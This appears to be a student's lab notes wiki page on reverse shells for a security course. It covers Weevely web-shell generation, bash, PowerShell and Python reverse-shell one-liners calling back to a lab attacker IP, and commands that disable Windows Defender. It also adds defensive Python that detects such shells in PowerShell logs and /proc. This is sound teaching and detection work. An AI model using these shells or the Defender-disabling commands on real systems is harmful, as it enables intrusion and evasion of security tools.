# Week 8 Reverse Shells (SEC 335) - Chromosom3/TechNotes GitHub Wiki

## Reflection
This week was fun. Reverse shells can be extremely helpful, and setting up several different ones was good practice. I liked that these labs had us working across multiple operating systems and types of reverse shells. I want to play more with Weevely, as it seems like a very useful tool. The other reverse shells send the connection and the commands being executed in the clear, so anyone monitoring the network can see them; for a pen tester this means you could alert the target. Using Weevely adds an extra layer of protection against this.
## Weevely

Weevely has three basic commands: `terminal`, `session`, and `generate`. You can use the `generate` command to create a new PHP web shell by running `weevely generate $password $file_name`. In this lab the command was `weevely generate TopSecret! navarro_weevely.php`. Once the web shell is created you can put it on the target server; for this lab anonymous FTP was used to upload the file to [http://10.0.5.25/upload/navarro_weevely.php](http://10.0.5.25/upload/navarro_weevely.php). Next, using the command `weevely terminal http://10.0.5.25/upload/navarro_weevely.php TopSecret!` we are able to connect to the session as shown in the figure below.

For more information on this tool visit the Kali documentation: https://www.kali.org/tools/weevely/
## Bash Reverse Shell - Lab 2

The first reverse shell that was done for the second lab was a bash reverse shell. The commands for it are pretty simple. The first thing you will need to do is have netcat listen on your attacker machine with `nc -lvp 5055`, where `5055` is the port number you want to listen on. Next, you will need to execute the command `/bin/bash -i >& /dev/tcp/10.0.17.107/5055 0>&1` on the remote (victim) system. For this lab that was done by uploading the PHP file seen below to the target server utilizing a file vulnerability. Once that file was in place the command `curl -v 10.0.5.25/upload/navarro_nc.php` was executed to run the file on the target system.

```php
<?php
// Executed by the web server when the file is requested with curl; the IP and
// port must match the netcat listener on the attacker machine.
exec("/bin/bash -c 'bash -i > /dev/tcp/10.0.99.36/5055 0>&1'");
?>
```
## Windows Reverse Shell - Lab 2
The next part of the second lab was to create a reverse shell on a Windows 10 system. Windows 10 ships with Windows Defender antivirus. Due to this the first thing we did for testing was to disable Windows Defender. To achieve this I used some of the lines from a script I wrote for my malware analysis course. The resulting commands can be seen below.
```powershell
# Disable Defender
Add-MpPreference -ExclusionPath 'C:'
Set-MpPreference -DisableRealtimeMonitoring $true
# Disable Auto Updates
New-Item -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows -Name WindowsUpdate -Force
New-Item -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate -Name AU -Force
New-ItemProperty -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU -Name NoAutoUpdate -PropertyType DWord -Value 1 -Force
```
Now that Defender is disabled we can run the command `nc -lvp 5055` on the attacker machine, where `5055` is the port number you want to listen on. Now that we are listening for a connection we can run the command below to connect back to the attacker machine. Note, the IP `10.0.17.107` and port `5055` should be changed to reflect your attacker machine information. IMPORTANT: This command should be run in CMD, not PowerShell, or it will not work: in PowerShell the outer shell would expand `$client`, `$stream` and the other variables inside the double-quoted string before the inner `powershell -c` ever sees them.

```powershell
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.17.107','5055'); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```
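The PowerShell one-liner above runs entirely in memory and never touches disk, so the host-side record a defender has of it is PowerShell script block logging (event 4104 in the Microsoft-Windows-PowerShell/Operational log). Windows splits a long script block over several 4104 events that share a ScriptBlockId, so a detection that looks at one event at a time can miss the shell. The Python below is an added example written for these notes, not code from the original page; it reassembles constructed 4104 records by ScriptBlockId and MessageNumber, then flags the TCPClient/GetStream/iex combination seen in the shell above and the Defender-disabling commands from the script earlier in this section. The indicator regexes, the subset of event fields used, and the sample records are this example's own assumptions.

```python
"""Reassemble PowerShell script block logs (event 4104) and flag reverse-shell traits.

Added example for these notes, not part of the original page. Windows splits a
long script block over several 4104 events that share a ScriptBlockId, so the
text is joined by id and MessageNumber before the indicators are applied.
"""
import re
from collections import defaultdict

# Indicator regexes are this example's own assumption, not a vendor rule set.
INDICATORS = [
    ("tcp_client", re.compile(r"System\.Net\.Sockets\.TCPClient", re.I)),
    ("stream_io", re.compile(r"\.GetStream\(\)", re.I)),
    ("remote_eval", re.compile(r"\b(iex|Invoke-Expression)\b", re.I)),
    ("defender_off", re.compile(
        r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$true", re.I)),
    ("update_off", re.compile(r"NoAutoUpdate", re.I)),
]
# All three of these together are the shape of the one-liner in the notes.
SHELL_TRIAD = {"tcp_client", "stream_io", "remote_eval"}

# Constructed sample 4104 records (ScriptBlockId values are placeholders).
# The shell block arrives as two chunks, out of order, as a real log might.
SAMPLE_EVENTS = [
    {"ScriptBlockId": "benign-0000", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Get-ChildItem C:\\Users | Sort-Object LastWriteTime"},
    {"ScriptBlockId": "shell-0001", "MessageNumber": 2, "MessageTotal": 2,
     "ScriptBlockText": "$sendback = (iex $data 2>&1 | Out-String);"},
    {"ScriptBlockId": "shell-0001", "MessageNumber": 1, "MessageTotal": 2,
     "ScriptBlockText": "$client = New-Object System.Net.Sockets.TCPClient("
                        "'10.0.17.107','5055'); $stream = $client.GetStream();"},
    {"ScriptBlockId": "tamper-0002", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Add-MpPreference -ExclusionPath 'C:'\n"
                        "Set-MpPreference -DisableRealtimeMonitoring $true"},
]


def reassemble(events):
    """Return {ScriptBlockId: (joined_text, is_complete)} from 4104 records."""
    chunks = defaultdict(dict)
    totals = {}
    for ev in events:
        sid = ev["ScriptBlockId"]
        chunks[sid][int(ev["MessageNumber"])] = ev["ScriptBlockText"]
        totals[sid] = int(ev["MessageTotal"])
    blocks = {}
    for sid, parts in chunks.items():
        # Chunks are joined in MessageNumber order; a block whose parts have
        # not all arrived yet is still analysed but marked incomplete.
        text = "".join(parts[n] for n in sorted(parts))
        blocks[sid] = (text, len(parts) == totals[sid])
    return blocks


def analyze(events):
    """Return one finding per reassembled block that trips a rule."""
    findings = []
    for sid, (text, complete) in reassemble(events).items():
        hits = {name for name, rx in INDICATORS if rx.search(text)}
        reasons = []
        if SHELL_TRIAD <= hits:
            reasons.append("reverse_shell")
        if hits & {"defender_off", "update_off"}:
            reasons.append("defense_tampering")
        if reasons:
            findings.append({"ScriptBlockId": sid, "reasons": reasons,
                             "indicators": sorted(hits), "complete": complete})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
    # Looking at either shell chunk on its own would miss the shell entirely.
    print("single chunk:", analyze([SAMPLE_EVENTS[2]]))
```

Running the script shows the benign block is ignored, the reassembled shell block is reported with all three indicators, and the Defender-tampering block is reported separately; feeding only the first shell chunk returns nothing, which is the point of reassembling before matching. In a real pipeline the same four fields can be pulled from the 4104 event XML or from a SIEM export.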
## Python - Lab 2

The final part of the second lab was to investigate other Linux reverse shells. While researching this I found a very useful resource, PayloadsAllTheThings, a repository with the description "A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques!". That repository can be found here. In this repository there is a specific page for reverse shells, which includes the Python reverse shell seen below. The link to the reverse shell page can be found here.

```bash
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.17.107",5055));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
```
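Both the bash `/dev/tcp` shell from Lab 2 and the Python `os.dup2()` one-liner above leave the shell's standard streams attached to the same socket, and that is what a defender can look for on the host: an interactive shell or interpreter whose fd 0 and fd 1 are the same socket inode. The Python script below is an added example written for these notes, not code from the original page or from PayloadsAllTheThings; it walks `/proc`, applies that rule, and resolves the socket inode to a remote peer through `/proc/net/tcp`. The `SHELL_NAMES` list is an assumption to edit for your environment, and the sample `/proc/net/tcp` text used in the test is constructed.

```python
"""Find interactive shells whose standard streams are attached to a TCP socket.

Added example for these notes (not code from the original page or any tool it
mentions). The bash /dev/tcp redirection and the Python os.dup2() one-liner
both leave fd 0/1(/2) of a shell pointing at one socket inode. Services
started by inetd or systemd socket activation also have socket stdio, so the
rule is limited to shell/interpreter process names. Classification is kept
separate from /proc reading so it can be tested on constructed data.
"""
import os
import re
from dataclasses import dataclass, field

SOCKET_RE = re.compile(r"^socket:\[(\d+)\]$")
# Assumed set of interpreters worth flagging; extend for your environment.
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "python", "python3", "perl", "php"}


@dataclass
class ProcInfo:
    pid: int
    comm: str                                 # contents of /proc/<pid>/comm
    fds: dict = field(default_factory=dict)   # fd -> readlink(/proc/<pid>/fd/<n>)


def socket_inodes(info):
    """Map each of fd 0/1/2 that points at a socket to its inode number."""
    out = {}
    for fd in (0, 1, 2):
        m = SOCKET_RE.match(info.fds.get(fd, ""))
        if m:
            out[fd] = m.group(1)
    return out


def classify(info):
    """Return a finding dict for a suspected reverse shell, else None.

    Rule: a shell/interpreter whose stdin and stdout are the *same* socket
    inode. stderr is optional because `bash -i > /dev/tcp/... 0>&1` (as in
    the PHP file above) leaves fd 2 on the terminal, while `>&` moves it too.
    """
    if info.comm not in SHELL_NAMES:
        return None
    socks = socket_inodes(info)
    if 0 not in socks or 1 not in socks or socks[0] != socks[1]:
        return None
    return {"pid": info.pid, "comm": info.comm,
            "inode": socks[0], "fds": sorted(socks)}


def parse_proc_net_tcp(text):
    """Parse /proc/net/tcp text into {inode: (remote_ip, remote_port)}.

    Addresses are little-endian hex: 6B11000A:13BF is 10.0.17.107:5055.
    """
    def decode(addr):
        h, p = addr.split(":")
        ip = ".".join(str(int(h[i:i + 2], 16)) for i in (6, 4, 2, 0))
        return ip, int(p, 16)
    table = {}
    for line in text.splitlines()[1:]:        # first line is the header
        parts = line.split()
        if len(parts) > 9:                    # parts[2]=rem_address, [9]=inode
            table[parts[9]] = decode(parts[2])
    return table


def read_proc(pid):
    """Read comm and the fd 0/1/2 link targets of one process (None if gone).

    Reading another user's /proc/<pid>/fd requires root (ptrace access).
    """
    base = f"/proc/{pid}"
    try:
        with open(f"{base}/comm") as fh:
            comm = fh.read().strip()
    except OSError:
        return None
    info = ProcInfo(pid, comm)
    for fd in (0, 1, 2):
        try:
            info.fds[fd] = os.readlink(f"{base}/fd/{fd}")
        except OSError:
            pass
    return info


def scan_proc():
    """Walk /proc and attach the remote peer to each finding when known."""
    try:
        with open("/proc/net/tcp") as fh:
            peers = parse_proc_net_tcp(fh.read())
    except OSError:
        peers = {}
    findings = []
    for name in os.listdir("/proc"):
        if name.isdigit():
            info = read_proc(int(name))
            hit = classify(info) if info else None
            if hit:
                hit["peer"] = peers.get(hit["inode"])
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for hit in scan_proc():
        print(f"pid {hit['pid']} ({hit['comm']}) stdio on socket "
              f"{hit['inode']} peer {hit['peer']}")
```

Run it as root (`sudo python3 find_socket_shells.py`) so it can follow every process's fd links; unprivileged it only sees your own processes. The peer lookup only covers IPv4 connections listed in `/proc/net/tcp`; a shell over IPv6 would need the same parse applied to `/proc/net/tcp6`, and a shell that has already disconnected leaves no row there but still shows up from the fd check.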